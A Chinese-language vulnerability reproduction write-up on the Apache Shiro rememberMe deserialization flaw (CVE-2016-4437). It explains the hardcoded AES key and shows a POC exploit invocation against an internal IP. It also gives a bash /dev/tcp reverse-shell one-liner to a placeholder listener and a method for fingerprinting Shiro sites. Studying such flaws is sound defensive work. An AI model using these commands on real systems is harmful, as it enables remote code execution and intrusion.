Apache Shiro反序列化漏洞復現(CVE-2016-4437)
0x00 Apache Shiro簡介
Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。
Apache Shiro 1.2.4及以前版本中,加密的使用者資訊序列化後儲存在名為remember-me的Cookie中。攻擊者可以使用Shiro的預設金鑰偽造使用者Cookie,觸發Java反序列化漏洞,進而在目標機器上執行任意命令。
只要rememberMe的AES加密金鑰洩露,無論shiro是什麼版本都會導致反序列化漏洞。
0x01 漏洞分析
Shiro提供了記住我(RememberMe)的功能,關閉了瀏覽器下次再開啟時還是能記住你是誰,下次訪問時無需再登入即可訪問。
Shiro對rememberMe的cookie做了加密處理,shiro在CookieRememberMeManaer類中將cookie中rememberMe欄位內容分別進行 序列化、AES加密、Base64編碼操作。
在識別身份的時候,需要對Cookie裡的rememberMe欄位解密。根據加密的順序,不難知道解密的順序為:
- 獲取rememberMe cookie
- base64 decode
- 解密AES
- 反序列化
但是,AES加密的金鑰Key被硬編碼在程式碼裡,意味著每個人通過原始碼都能拿到AES加密的金鑰。因此,攻擊者構造一個惡意的物件,並且對其序列化,AES加密,base64編碼後,作為cookie的rememberMe欄位傳送。Shiro將rememberMe進行解密並且反序列化,最終造成反序列化漏洞。
0x02 使用POC自動化攻擊
為了驗證POC是否可用,我們試著利用POC在伺服器新建一個a.txt檔案。
python shiro_exploit.py -t 3 -u http://192.168.2.184:8080 -p "touch a.txt"
建立成功:
0x03 利用nc反彈shell
為解決通過Runtime.getRuntime().exec()執行命令的有效負載有時會失敗的問題,使用線上轉換器轉換命令,保證沒有空格的存在。
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/3444 0>&1
執行POC
反彈成功
0x04 利用姿勢
(1)如何判斷一個站點使用了shiro框架?我們只需將發包中的cookie設定為Cookie: rememberMe=1 向根目錄/ 傳送POST/GET請求,若返回rememberMe=deleteMe, 那麼就是shiro的程式碼。
0x05 參考連線
https://www.cnblogs.com/renhaoblog/p/12971152.html(我的老部長~)
宣告:以上僅用作學習研究,切勿用作違反犯罪活動~